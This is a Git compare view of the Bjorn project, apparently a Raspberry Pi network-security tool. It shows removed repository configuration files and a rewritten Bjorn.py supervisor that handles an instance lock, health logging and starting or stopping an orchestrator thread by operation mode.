10 Commits
v1.0.0 ... ai

Author SHA1 Message Date
infinition
aac77a3e76 Add Loki and Sentinel utility classes for web API endpoints
- Implemented LokiUtils class with GET and POST endpoints for managing scripts, jobs, and payloads.
- Added SentinelUtils class with GET and POST endpoints for managing events, rules, devices, and notifications.
- Both classes include error handling and JSON response formatting.
2026-03-14 22:33:10 +01:00
Fabien POLLY
eb20b168a6 Add RLUtils class for managing RL/AI dashboard endpoints
- Implemented methods for fetching AI stats, training history, and recent experiences.
- Added functionality to set operation mode (MANUAL, AUTO, AI) with appropriate handling.
- Included helper methods for querying the database and sending JSON responses.
- Integrated model metadata extraction for visualization purposes.
2026-02-18 22:36:10 +01:00
Fabien POLLY
b8a13cc698 wiki test 2026-01-24 18:06:18 +01:00
Fabien POLLY
a78d05a87d Readme modified with Architecture link 2025-12-10 16:44:36 +01:00
Fabien POLLY
dec45ab608 docs: Add initial architecture documentation for Bjorn Cyberviking. 2025-12-10 16:40:52 +01:00
Fabien POLLY
d3b0b02a0b feat: Added ARCHITECTURE.md file 2025-12-10 16:39:59 +01:00
Fabien POLLY
c1729756c0 BREAKING CHANGE: Complete refactor of architecture to prepare BJORN V2 release, APIs, assets, and UI, webapp, logics, attacks, a lot of new features... 2025-12-10 16:01:03 +01:00
Fabien POLLY
a748f523a9 chore: Add 'test' to comment line. 2025-12-02 17:35:34 +01:00
infinition
aa3d6712c6 Merge pull request #137 from infinition/main 2025-09-15 22:32:27 +02:00
infinition
5c4882a515 Merge pull request #52 from infinition/main
Sync the updates for the DEV branch in order to prepare a release on the main
2024-11-21 10:06:03 +01:00
1053 changed files with 155351 additions and 12167 deletions

2
.gitattributes vendored
View File

@@ -1,2 +0,0 @@
*.sh text eol=lf
*.py text eol=lf

15
.github/FUNDING.yml vendored
View File

@@ -1,15 +0,0 @@
# These are supported funding model platforms
#github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
#patreon: # Replace with a single Patreon username
#open_collective: # Replace with a single Open Collective username
#ko_fi: # Replace with a single Ko-fi username
#tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
#community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
#liberapay: # Replace with a single Liberapay username
#issuehunt: # Replace with a single IssueHunt username
#lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry
#polar: # Replace with a single Polar username
buy_me_a_coffee: infinition
#thanks_dev: # Replace with a single thanks.dev username
#custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']

View File

@@ -1,34 +0,0 @@
---
name: Bug report
about: Create a report to help us improve
title: ""
labels: ""
assignees: ""
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Scroll down to '....'
4. See error
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Hardware (please complete the following information):**
- Device: [e.g. iPhone6]
- OS: [e.g. iOS]
- Browser [e.g. chrome, safari]
- Version [e.g. 22]
**Additional context**
Add any other context about the problem here.

View File

@@ -1,11 +0,0 @@
---
# .github/ISSUE_TEMPLATE/config.yml
blank_issues_enabled: false
contact_links:
- name: Bjorn Community Support
url: https://github.com/infinition/bjorn/discussions
about: Please ask and answer questions here.
- name: Bjorn Security Reports
url: https://infinition.github.io/bjorn/SECURITY
about: Please report security vulnerabilities here.

View File

@@ -1,19 +0,0 @@
---
name: Feature request
about: Suggest an idea for this project
title: ""
labels: ""
assignees: ""
---
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.
**Additional context**
Add any other context or screenshots about the feature request here.

View File

@@ -1,12 +0,0 @@
# .github/dependabot.yml
version: 2
updates:
- package-ecosystem: "pip"
directory: "."
schedule:
interval: "weekly"
commit-message:
prefix: "fix(deps)"
open-pull-requests-limit: 5
target-branch: "dev"

137
.gitignore vendored
View File

@@ -1,137 +0,0 @@
# Node.js / npm
node_modules/
npm-debug.log*
yarn-debug.log*
yarn-error.log*
.pnpm-debug.log*
package-lock.json*
# TypeScript / TSX
dist/
*.tsbuildinfo
# Poetry
poetry.lock
# Environment variables
.env
.env.*.local
# Logs
logs
*.log
pnpm-debug.log*
lerna-debug.log*
# Dependency directories
jspm_packages/
# Optional npm cache directory
.npm
# Output of 'npm pack'
*.tgz
# Lockfiles
yarn.lock
.pnpm-lock.yaml
# Optional eslint cache
.eslintcache
# Optional stylelint cache
.stylelintcache
# Optional REPL history
.node_repl_history
# Coverage directory used by tools like
instanbul/
istanbul/jest
jest/
coverage/
# Output of 'tsc' command
out/
build/
tmp/
temp/
# Python
__pycache__/
*.py[cod]
*.so
*.egg
*.egg-info/
pip-wheel-metadata/
*.pyo
*.pyd
*.whl
*.pytest_cache/
.tox/
env/
venv
venv/
ENV/
env.bak/
.venv/
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# Coverage reports
htmlcov/
.coverage
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
# Jupyter Notebook
.ipynb_checkpoints
# Django stuff:
staticfiles/
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# VS Code settings
.vscode/
.idea/
# macOS files
.DS_Store
.AppleDouble
.LSOverride
# Windows files
Thumbs.db
ehthumbs.db
Desktop.ini
$RECYCLE.BIN/
# Linux system files
*.swp
*~
# IDE specific
*.iml
*.suo
*.ntvs*
*.njsproj
*.sln
*.sw?
scripts
*/certs/

652
.pylintrc
View File

@@ -1,652 +0,0 @@
[MAIN]
# Analyse import fallback blocks. This can be used to support both Python 2 and
# 3 compatible code, which means that the block might have code that exists
# only in one or another interpreter, leading to false positives when analysed.
analyse-fallback-blocks=no
# Clear in-memory caches upon conclusion of linting. Useful if running pylint
# in a server-like mode.
clear-cache-post-run=no
# Load and enable all available extensions. Use --list-extensions to see a list
# all available extensions.
#enable-all-extensions=
# In error mode, messages with a category besides ERROR or FATAL are
# suppressed, and no reports are done by default. Error mode is compatible with
# disabling specific errors.
#errors-only=
# Always return a 0 (non-error) status code, even if lint errors are found.
# This is primarily useful in continuous integration scripts.
#exit-zero=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code.
extension-pkg-allow-list=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code. (This is an alternative name to extension-pkg-allow-list
# for backward compatibility.)
extension-pkg-whitelist=
# Return non-zero exit code if any of these messages/categories are detected,
# even if score is above --fail-under value. Syntax same as enable. Messages
# specified are enabled, while categories only check already-enabled messages.
fail-on=
# Specify a score threshold under which the program will exit with error.
fail-under=8
# Interpret the stdin as a python script, whose filename needs to be passed as
# the module_or_package argument.
#from-stdin=
# Files or directories to be skipped. They should be base names, not paths.
ignore=venv,node_modules,scripts
# Add files or directories matching the regular expressions patterns to the
# ignore-list. The regex matches against paths and can be in Posix or Windows
# format. Because '\\' represents the directory delimiter on Windows systems,
# it can't be used as an escape character.
ignore-paths=
# Files or directories matching the regular expression patterns are skipped.
# The regex matches against base names, not paths. The default value ignores
# Emacs file locks
ignore-patterns=^\.#
# List of module names for which member attributes should not be checked and
# will not be imported (useful for modules/projects where namespaces are
# manipulated during runtime and thus existing member attributes cannot be
# deduced by static analysis). It supports qualified module names, as well as
# Unix pattern matching.
ignored-modules=
# Python code to execute, usually for sys.path manipulation such as
# pygtk.require().
#init-hook=
# Use multiple processes to speed up Pylint. Specifying 0 will auto-detect the
# number of processors available to use, and will cap the count on Windows to
# avoid hangs.
jobs=1
# Control the amount of potential inferred values when inferring a single
# object. This can help the performance when dealing with large functions or
# complex, nested conditions.
limit-inference-results=100
# List of plugins (as comma separated values of python module names) to load,
# usually to register additional checkers.
load-plugins=
# Pickle collected data for later comparisons.
persistent=yes
# Resolve imports to .pyi stubs if available. May reduce no-member messages and
# increase not-an-iterable messages.
prefer-stubs=no
# Minimum Python version to use for version dependent checks. Will default to
# the version used to run pylint.
py-version=3.12
# Discover python modules and packages in the file system subtree.
recursive=no
# Add paths to the list of the source roots. Supports globbing patterns. The
# source root is an absolute path or a path relative to the current working
# directory used to determine a package namespace for modules located under the
# source root.
source-roots=
# When enabled, pylint would attempt to guess common misconfiguration and emit
# user-friendly hints instead of false-positive error messages.
suggestion-mode=yes
# Allow loading of arbitrary C extensions. Extensions are imported into the
# active Python interpreter and may run arbitrary code.
unsafe-load-any-extension=no
# In verbose mode, extra non-checker-related info will be displayed.
#verbose=
[BASIC]
# Naming style matching correct argument names.
argument-naming-style=snake_case
# Regular expression matching correct argument names. Overrides argument-
# naming-style. If left empty, argument names will be checked with the set
# naming style.
#argument-rgx=
# Naming style matching correct attribute names.
attr-naming-style=snake_case
# Regular expression matching correct attribute names. Overrides attr-naming-
# style. If left empty, attribute names will be checked with the set naming
# style.
#attr-rgx=
# Bad variable names which should always be refused, separated by a comma.
bad-names=foo,
bar,
baz,
toto,
tutu,
tata
# Bad variable names regexes, separated by a comma. If names match any regex,
# they will always be refused
bad-names-rgxs=
# Naming style matching correct class attribute names.
class-attribute-naming-style=any
# Regular expression matching correct class attribute names. Overrides class-
# attribute-naming-style. If left empty, class attribute names will be checked
# with the set naming style.
#class-attribute-rgx=
# Naming style matching correct class constant names.
class-const-naming-style=UPPER_CASE
# Regular expression matching correct class constant names. Overrides class-
# const-naming-style. If left empty, class constant names will be checked with
# the set naming style.
#class-const-rgx=
# Naming style matching correct class names.
class-naming-style=PascalCase
# Regular expression matching correct class names. Overrides class-naming-
# style. If left empty, class names will be checked with the set naming style.
#class-rgx=
# Naming style matching correct constant names.
const-naming-style=UPPER_CASE
# Regular expression matching correct constant names. Overrides const-naming-
# style. If left empty, constant names will be checked with the set naming
# style.
#const-rgx=
# Minimum line length for functions/classes that require docstrings, shorter
# ones are exempt.
docstring-min-length=-1
# Naming style matching correct function names.
function-naming-style=snake_case
# Regular expression matching correct function names. Overrides function-
# naming-style. If left empty, function names will be checked with the set
# naming style.
#function-rgx=
# Good variable names which should always be accepted, separated by a comma.
good-names=i,
j,
k,
ex,
Run,
_
# Good variable names regexes, separated by a comma. If names match any regex,
# they will always be accepted
good-names-rgxs=
# Include a hint for the correct naming format with invalid-name.
include-naming-hint=no
# Naming style matching correct inline iteration names.
inlinevar-naming-style=any
# Regular expression matching correct inline iteration names. Overrides
# inlinevar-naming-style. If left empty, inline iteration names will be checked
# with the set naming style.
#inlinevar-rgx=
# Naming style matching correct method names.
method-naming-style=snake_case
# Regular expression matching correct method names. Overrides method-naming-
# style. If left empty, method names will be checked with the set naming style.
#method-rgx=
# Naming style matching correct module names.
module-naming-style=snake_case
# Regular expression matching correct module names. Overrides module-naming-
# style. If left empty, module names will be checked with the set naming style.
#module-rgx=
# Colon-delimited sets of names that determine each other's naming style when
# the name regexes allow several styles.
name-group=
# Regular expression which should only match function or class names that do
# not require a docstring.
no-docstring-rgx=^_
# List of decorators that produce properties, such as abc.abstractproperty. Add
# to this list to register other decorators that produce valid properties.
# These decorators are taken in consideration only for invalid-name.
property-classes=abc.abstractproperty
# Regular expression matching correct type alias names. If left empty, type
# alias names will be checked with the set naming style.
#typealias-rgx=
# Regular expression matching correct type variable names. If left empty, type
# variable names will be checked with the set naming style.
#typevar-rgx=
# Naming style matching correct variable names.
variable-naming-style=snake_case
# Regular expression matching correct variable names. Overrides variable-
# naming-style. If left empty, variable names will be checked with the set
# naming style.
variable-rgx=[a-z_][a-z0-9_]{2,30}$
[CLASSES]
# Warn about protected attribute access inside special methods
check-protected-access-in-special-methods=no
# List of method names used to declare (i.e. assign) instance attributes.
defining-attr-methods=__init__,
__new__,
setUp,
asyncSetUp,
__post_init__
# List of member names, which should be excluded from the protected access
# warning.
exclude-protected=_asdict,_fields,_replace,_source,_make,os._exit
# List of valid names for the first argument in a class method.
valid-classmethod-first-arg=cls
# List of valid names for the first argument in a metaclass class method.
valid-metaclass-classmethod-first-arg=mcs
[DESIGN]
# List of regular expressions of class ancestor names to ignore when counting
# public methods (see R0903)
exclude-too-few-public-methods=
# List of qualified class names to ignore when counting class parents (see
# R0901)
ignored-parents=
# Maximum number of arguments for function / method.
max-args=5
# Maximum number of attributes for a class (see R0902).
max-attributes=7
# Maximum number of boolean expressions in an if statement (see R0916).
max-bool-expr=5
# Maximum number of branch for function / method body.
max-branches=12
# Maximum number of locals for function / method body.
max-locals=15
# Maximum number of parents for a class (see R0901).
max-parents=7
# Maximum number of positional arguments for function / method.
max-positional-arguments=5
# Maximum number of public methods for a class (see R0904).
max-public-methods=20
# Maximum number of return / yield for function / method body.
max-returns=6
# Maximum number of statements in function / method body.
max-statements=50
# Minimum number of public methods for a class (see R0903).
min-public-methods=2
[EXCEPTIONS]
# Exceptions that will emit a warning when caught.
overgeneral-exceptions=builtins.BaseException,builtins.Exception
[FORMAT]
# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
expected-line-ending-format=
# Regexp for a line that is allowed to be longer than the limit.
ignore-long-lines=^\s*(# )?<?https?://\S+>?$
# Number of spaces of indent required inside a hanging or continued line.
indent-after-paren=4
# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1
# tab).
indent-string=' '
# Maximum number of characters on a single line.
max-line-length=100
# Maximum number of lines in a module.
max-module-lines=2500
# Allow the body of a class to be on the same line as the declaration if body
# contains single statement.
single-line-class-stmt=no
# Allow the body of an if to be on the same line as the test if there is no
# else.
single-line-if-stmt=no
[IMPORTS]
# List of modules that can be imported at any level, not just the top level
# one.
allow-any-import-level=
# Allow explicit reexports by alias from a package __init__.
allow-reexport-from-package=no
# Allow wildcard imports from modules that define __all__.
allow-wildcard-with-all=no
# Deprecated modules which should not be used, separated by a comma.
deprecated-modules=
# Output a graph (.gv or any supported image format) of external dependencies
# to the given file (report RP0402 must not be disabled).
ext-import-graph=
# Output a graph (.gv or any supported image format) of all (i.e. internal and
# external) dependencies to the given file (report RP0402 must not be
# disabled).
import-graph=
# Output a graph (.gv or any supported image format) of internal dependencies
# to the given file (report RP0402 must not be disabled).
int-import-graph=
# Force import order to recognize a module as part of the standard
# compatibility libraries.
known-standard-library=
# Force import order to recognize a module as part of a third party library.
known-third-party=enchant
# Couples of modules and preferred modules, separated by a comma.
preferred-modules=
[LOGGING]
# The type of string formatting that logging methods do. `old` means using %
# formatting, `new` is for `{}` formatting.
logging-format-style=new
# Logging modules to check that the string format arguments are in logging
# function parameter format.
logging-modules=logging
[MESSAGES CONTROL]
# Only show warnings with the listed confidence levels. Leave empty to show
# all. Valid levels: HIGH, CONTROL_FLOW, INFERENCE, INFERENCE_FAILURE,
# UNDEFINED.
confidence=HIGH,
CONTROL_FLOW,
INFERENCE,
INFERENCE_FAILURE,
UNDEFINED
# Disable the message, report, category or checker with the given id(s). You
# can either give multiple identifiers separated by comma (,) or put this
# option multiple times (only on the command line, not in the configuration
# file where it should appear only once). You can also use "--disable=all" to
# disable everything first and then re-enable specific checks. For example, if
# you want to run only the similarities checker, you can use "--disable=all
# --enable=similarities". If you want to run only the classes checker, but have
# no Warning level messages displayed, use "--disable=all --enable=classes
# --disable=W".
disable=missing-module-docstring,
invalid-name,
too-few-public-methods,
E1101,
C0115,
duplicate-code,
raise-missing-from,
wrong-import-order,
ungrouped-imports,
reimported,
too-many-locals,
missing-timeout,
broad-exception-caught,
broad-exception-raised,
line-too-long
# Enable the message, report, category or checker with the given id(s). You can
# either give multiple identifier separated by comma (,) or put this option
# multiple time (only on the command line, not in the configuration file where
# it should appear only once). See also the "--disable" option for examples.
#enable=
[METHOD_ARGS]
# List of qualified names (i.e., library.method) which require a timeout
# parameter e.g. 'requests.api.get,requests.api.post'
timeout-methods=requests.api.delete,requests.api.get,requests.api.head,requests.api.options,requests.api.patch,requests.api.post,requests.api.put,requests.api.request
[MISCELLANEOUS]
# List of note tags to take in consideration, separated by a comma.
notes=FIXME,
XXX,
TODO
# Regular expression of note tags to take in consideration.
notes-rgx=
[REFACTORING]
# Maximum number of nested blocks for function / method body
max-nested-blocks=5
# Complete name of functions that never returns. When checking for
# inconsistent-return-statements if a never returning function is called then
# it will be considered as an explicit return statement and no message will be
# printed.
never-returning-functions=sys.exit,argparse.parse_error
# Let 'consider-using-join' be raised when the separator to join on would be
# non-empty (resulting in expected fixes of the type: ``"- " + " -
# ".join(items)``)
suggest-join-with-non-empty-separator=yes
[REPORTS]
# Python expression which should return a score less than or equal to 10. You
# have access to the variables 'fatal', 'error', 'warning', 'refactor',
# 'convention', and 'info' which contain the number of messages in each
# category, as well as 'statement' which is the total number of statements
# analyzed. This score is used by the global evaluation report (RP0004).
evaluation=max(0, 0 if fatal else 10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10))
# Template used to display messages. This is a python new-style format string
# used to format the message information. See doc for all details.
msg-template=
# Set the output format. Available formats are: text, parseable, colorized,
# json2 (improved json format), json (old json format) and msvs (visual
# studio). You can also give a reporter class, e.g.
# mypackage.mymodule.MyReporterClass.
#output-format=
# Tells whether to display a full report or only the messages.
reports=no
# Activate the evaluation score.
score=yes
[SIMILARITIES]
# Comments are removed from the similarity computation
ignore-comments=yes
# Docstrings are removed from the similarity computation
ignore-docstrings=yes
# Imports are removed from the similarity computation
ignore-imports=yes
# Signatures are removed from the similarity computation
ignore-signatures=yes
# Minimum lines number of a similarity.
min-similarity-lines=4
[SPELLING]
# Limits count of emitted suggestions for spelling mistakes.
max-spelling-suggestions=4
# Spelling dictionary name. No available dictionaries : You need to install
# both the python package and the system dependency for enchant to work.
spelling-dict=
# List of comma separated words that should be considered directives if they
# appear at the beginning of a comment and should not be checked.
spelling-ignore-comment-directives=fmt: on,fmt: off,noqa:,noqa,nosec,isort:skip,mypy:
# List of comma separated words that should not be checked.
spelling-ignore-words=
# A path to a file that contains the private dictionary; one word per line.
spelling-private-dict-file=
# Tells whether to store unknown words to the private dictionary (see the
# --spelling-private-dict-file option) instead of raising a message.
spelling-store-unknown-words=no
[STRING]
# This flag controls whether inconsistent-quotes generates a warning when the
# character used as a quote delimiter is used inconsistently within a module.
check-quote-consistency=no
# This flag controls whether the implicit-str-concat should generate a warning
# on implicit string concatenation in sequences defined over several lines.
check-str-concat-over-line-jumps=no
[TYPECHECK]
# List of decorators that produce context managers, such as
# contextlib.contextmanager. Add to this list to register other decorators that
# produce valid context managers.
contextmanager-decorators=contextlib.contextmanager
# List of members which are set dynamically and missed by pylint inference
# system, and so shouldn't trigger E1101 when accessed. Python regular
# expressions are accepted.
generated-members=
# Tells whether to warn about missing members when the owner of the attribute
# is inferred to be None.
ignore-none=yes
# This flag controls whether pylint should warn about no-member and similar
# checks whenever an opaque object is returned when inferring. The inference
# can return multiple potential results while evaluating a Python object, but
# some branches might not be evaluated, which results in partial inference. In
# that case, it might be useful to still emit no-member and other checks for
# the rest of the inferred objects.
ignore-on-opaque-inference=yes
# List of symbolic message names to ignore for Mixin members.
ignored-checks-for-mixins=no-member,
not-async-context-manager,
not-context-manager,
attribute-defined-outside-init
# List of class names for which member attributes should not be checked (useful
# for classes with dynamically set attributes). This supports the use of
# qualified names.
ignored-classes=optparse.Values,thread._local,_thread._local,argparse.Namespace
# Show a hint with possible names when a member name was not found. The aspect
# of finding the hint is based on edit distance.
missing-member-hint=yes
# The minimum edit distance a name should have in order to be considered a
# similar match for a missing member name.
missing-member-hint-distance=1
# The total number of similar names that should be taken in consideration when
# showing a hint for a missing member.
missing-member-max-choices=1
# Regex pattern to define which classes are considered mixins.
mixin-class-rgx=.*[Mm]ixin
# List of decorators that change the signature of a decorated function.
signature-mutators=
[VARIABLES]
# List of additional names supposed to be defined in builtins. Remember that
# you should avoid defining new builtins when possible.
additional-builtins=
# Tells whether unused global variables should be treated as a violation.
allow-global-unused-variables=yes
# List of names allowed to shadow builtins
allowed-redefined-builtins=
# List of strings which can identify a callback function by name. A callback
# name must start or end with one of those strings.
callbacks=cb_,
_cb
# A regular expression matching the name of dummy variables (i.e. expected to
# not be used).
dummy-variables-rgx=_+$|(_[a-zA-Z0-9_]*[a-zA-Z0-9]+?$)|dummy|^ignored_|^unused_
# Argument names that match this expression will be ignored.
ignored-argument-names=_.*|^ignored_|^unused_
# Tells whether we should check for unused import in __init__ files.
init-import=no
# List of qualified module names which can have objects that can redefine
# builtins.
redefining-builtins-modules=six.moves,past.builtins,future.builtins,builtins,io

744
Bjorn.py
View File

@@ -1,158 +1,694 @@
#bjorn.py
# This script defines the main execution flow for the Bjorn application. It initializes and starts
# various components such as network scanning, display, and web server functionalities. The Bjorn
# class manages the primary operations, including initiating network scans and orchestrating tasks.
# The script handles startup delays, checks for Wi-Fi connectivity, and coordinates the execution of
# scanning and orchestrator tasks using semaphores to limit concurrent threads. It also sets up
# signal handlers to ensure a clean exit when the application is terminated.
# Bjorn.py
# Main entry point and supervisor for the Bjorn project
# Manages lifecycle of threads, health monitoring, and crash protection.
# OPTIMIZED FOR PI ZERO 2: Low CPU overhead, aggressive RAM management.
# Functions:
# - handle_exit: handles the termination of the main and display threads.
# - handle_exit_webserver: handles the termination of the web server thread.
# - is_wifi_connected: Checks for Wi-Fi connectivity using the nmcli command.
# The script starts by loading shared data configurations, then initializes and sta
# bjorn.py
import threading
import signal
import logging
import time
import sys
import os
import signal
import subprocess
from init_shared import shared_data
from display import Display, handle_exit_display
import sys
import threading
import time
import gc
import tracemalloc
import atexit
from comment import Commentaireia
from webapp import web_thread, handle_exit_web
from orchestrator import Orchestrator
from display import Display, handle_exit_display
from init_shared import shared_data
from logger import Logger
from orchestrator import Orchestrator
from runtime_state_updater import RuntimeStateUpdater
from webapp import web_thread
logger = Logger(name="Bjorn.py", level=logging.DEBUG)
_shutdown_lock = threading.Lock()
_shutdown_started = False
_instance_lock_fd = None
_instance_lock_path = "/tmp/bjorn_160226.lock"
try:
import fcntl
except Exception:
fcntl = None
def _release_instance_lock():
global _instance_lock_fd
if _instance_lock_fd is None:
return
try:
if fcntl is not None:
try:
fcntl.flock(_instance_lock_fd.fileno(), fcntl.LOCK_UN)
except Exception:
pass
_instance_lock_fd.close()
except Exception:
pass
_instance_lock_fd = None
def _acquire_instance_lock() -> bool:
"""Ensure only one Bjorn_160226 process can run at once."""
global _instance_lock_fd
if _instance_lock_fd is not None:
return True
try:
fd = open(_instance_lock_path, "a+", encoding="utf-8")
except Exception as exc:
logger.error(f"Unable to open instance lock file {_instance_lock_path}: {exc}")
return True
if fcntl is None:
_instance_lock_fd = fd
return True
try:
fcntl.flock(fd.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
fd.seek(0)
fd.truncate()
fd.write(str(os.getpid()))
fd.flush()
except OSError:
try:
fd.seek(0)
owner_pid = fd.read().strip() or "unknown"
except Exception:
owner_pid = "unknown"
logger.critical(f"Another Bjorn instance is already running (pid={owner_pid}).")
try:
fd.close()
except Exception:
pass
return False
_instance_lock_fd = fd
return True
class HealthMonitor(threading.Thread):
"""Periodic runtime health logger (threads/fd/rss/queue/epd metrics)."""
def __init__(self, shared_data_, interval_s: int = 60):
super().__init__(daemon=True, name="HealthMonitor")
self.shared_data = shared_data_
self.interval_s = max(10, int(interval_s))
self._stop_event = threading.Event()
self._tm_prev_snapshot = None
self._tm_last_report = 0.0
def stop(self):
self._stop_event.set()
def _fd_count(self) -> int:
try:
return len(os.listdir("/proc/self/fd"))
except Exception:
return -1
def _rss_kb(self) -> int:
try:
with open("/proc/self/status", "r", encoding="utf-8") as fh:
for line in fh:
if line.startswith("VmRSS:"):
parts = line.split()
if len(parts) >= 2:
return int(parts[1])
except Exception:
pass
return -1
def _queue_counts(self):
pending = running = scheduled = -1
try:
# Using query_one safe method from database
row = self.shared_data.db.query_one(
"""
SELECT
SUM(CASE WHEN status='pending' THEN 1 ELSE 0 END) AS pending,
SUM(CASE WHEN status='running' THEN 1 ELSE 0 END) AS running,
SUM(CASE WHEN status='scheduled' THEN 1 ELSE 0 END) AS scheduled
FROM action_queue
"""
)
if row:
pending = int(row.get("pending") or 0)
running = int(row.get("running") or 0)
scheduled = int(row.get("scheduled") or 0)
except Exception as exc:
logger.error_throttled(
f"Health monitor queue count query failed: {exc}",
key="health_queue_counts",
interval_s=120,
)
return pending, running, scheduled
def run(self):
while not self._stop_event.wait(self.interval_s):
try:
threads = threading.enumerate()
thread_count = len(threads)
top_threads = ",".join(t.name for t in threads[:8])
fd_count = self._fd_count()
rss_kb = self._rss_kb()
pending, running, scheduled = self._queue_counts()
# Lock to safely read shared metrics without race conditions
with self.shared_data.health_lock:
display_metrics = dict(getattr(self.shared_data, "display_runtime_metrics", {}) or {})
epd_enabled = int(display_metrics.get("epd_enabled", 0))
epd_failures = int(display_metrics.get("failed_updates", 0))
epd_reinit = int(display_metrics.get("reinit_attempts", 0))
epd_headless = int(display_metrics.get("headless", 0))
epd_last_success = display_metrics.get("last_success_epoch", 0)
logger.info(
"health "
f"thread_count={thread_count} "
f"rss_kb={rss_kb} "
f"queue_pending={pending} "
f"epd_failures={epd_failures} "
f"epd_reinit={epd_reinit} "
)
# Optional: tracemalloc report (only if enabled via PYTHONTRACEMALLOC or tracemalloc.start()).
try:
if tracemalloc.is_tracing():
now = time.monotonic()
tm_interval = float(self.shared_data.config.get("tracemalloc_report_interval_s", 300) or 300)
if tm_interval > 0 and (now - self._tm_last_report) >= tm_interval:
self._tm_last_report = now
top_n = int(self.shared_data.config.get("tracemalloc_top_n", 10) or 10)
top_n = max(3, min(top_n, 25))
snap = tracemalloc.take_snapshot()
if self._tm_prev_snapshot is not None:
stats = snap.compare_to(self._tm_prev_snapshot, "lineno")[:top_n]
logger.info(f"mem_top (tracemalloc diff, top_n={top_n})")
for st in stats:
logger.info(f"mem_top {st}")
else:
stats = snap.statistics("lineno")[:top_n]
logger.info(f"mem_top (tracemalloc, top_n={top_n})")
for st in stats:
logger.info(f"mem_top {st}")
self._tm_prev_snapshot = snap
except Exception as exc:
logger.error_throttled(
f"Health monitor tracemalloc failure: {exc}",
key="health_tracemalloc_error",
interval_s=300,
)
except Exception as exc:
logger.error_throttled(
f"Health monitor loop failure: {exc}",
key="health_loop_error",
interval_s=120,
)
class Bjorn:
"""Main class for Bjorn. Manages the primary operations of the application."""
def __init__(self, shared_data):
self.shared_data = shared_data
"""Main class for Bjorn. Manages orchestration lifecycle."""
def __init__(self, shared_data_):
self.shared_data = shared_data_
self.commentaire_ia = Commentaireia()
self.orchestrator_thread = None
self.orchestrator = None
self.network_connected = False
self.wifi_connected = False
self.previous_network_connected = None
self._orch_lock = threading.Lock()
self._last_net_check = 0 # Throttling for network scan
self._last_orch_stop_attempt = 0.0
def run(self):
"""Main loop for Bjorn. Waits for Wi-Fi connection and starts Orchestrator."""
# Wait for startup delay if configured in shared data
if hasattr(self.shared_data, 'startup_delay') and self.shared_data.startup_delay > 0:
"""Main loop for Bjorn. Waits for network and starts/stops Orchestrator based on mode."""
if hasattr(self.shared_data, "startup_delay") and self.shared_data.startup_delay > 0:
logger.info(f"Waiting for startup delay: {self.shared_data.startup_delay} seconds")
time.sleep(self.shared_data.startup_delay)
# Main loop to keep Bjorn running
backoff_s = 1.0
while not self.shared_data.should_exit:
if not self.shared_data.manual_mode:
self.check_and_start_orchestrator()
time.sleep(10) # Main loop idle waiting
try:
# Manual/Bifrost mode must stop orchestration.
# BIFROST: WiFi is in monitor mode, no network available for scans.
current_mode = self.shared_data.operation_mode
if current_mode in ("MANUAL", "BIFROST", "LOKI"):
# Avoid spamming stop requests if already stopped.
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
self.stop_orchestrator()
else:
self.check_and_start_orchestrator()
time.sleep(5)
backoff_s = 1.0 # Reset backoff on success
except Exception as exc:
logger.error(f"Bjorn main loop error: {exc}")
logger.error_throttled(
"Bjorn main loop entering backoff due to repeated errors",
key="bjorn_main_loop_backoff",
interval_s=60,
)
time.sleep(backoff_s)
backoff_s = min(backoff_s * 2.0, 30.0)
def check_and_start_orchestrator(self):
"""Check Wi-Fi and start the orchestrator if connected."""
if self.is_wifi_connected():
if self.shared_data.operation_mode in ("MANUAL", "BIFROST", "LOKI"):
return
if self.is_network_connected():
self.wifi_connected = True
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
self.start_orchestrator()
else:
self.wifi_connected = False
logger.info("Waiting for Wi-Fi connection to start Orchestrator...")
logger.info_throttled(
"Waiting for network connection to start Orchestrator...",
key="bjorn_wait_network",
interval_s=30,
)
def start_orchestrator(self):
"""Start the orchestrator thread."""
self.is_wifi_connected() # reCheck if Wi-Fi is connected before starting the orchestrator
if self.wifi_connected: # Check if Wi-Fi is connected before starting the orchestrator
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
logger.info("Starting Orchestrator thread...")
self.shared_data.orchestrator_should_exit = False
self.shared_data.manual_mode = False
self.orchestrator = Orchestrator()
self.orchestrator_thread = threading.Thread(target=self.orchestrator.run)
self.orchestrator_thread.start()
logger.info("Orchestrator thread started, automatic mode activated.")
else:
logger.info("Orchestrator thread is already running.")
else:
logger.warning("Cannot start Orchestrator: Wi-Fi is not connected.")
with self._orch_lock:
# Re-check network inside lock
if not self.network_connected:
return
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
logger.debug("Orchestrator thread is already running.")
return
logger.info("Starting Orchestrator thread...")
self.shared_data.orchestrator_should_exit = False
self.orchestrator = Orchestrator()
self.orchestrator_thread = threading.Thread(
target=self.orchestrator.run,
daemon=True,
name="OrchestratorMain",
)
self.orchestrator_thread.start()
logger.info("Orchestrator thread started.")
def stop_orchestrator(self):
"""Stop the orchestrator thread."""
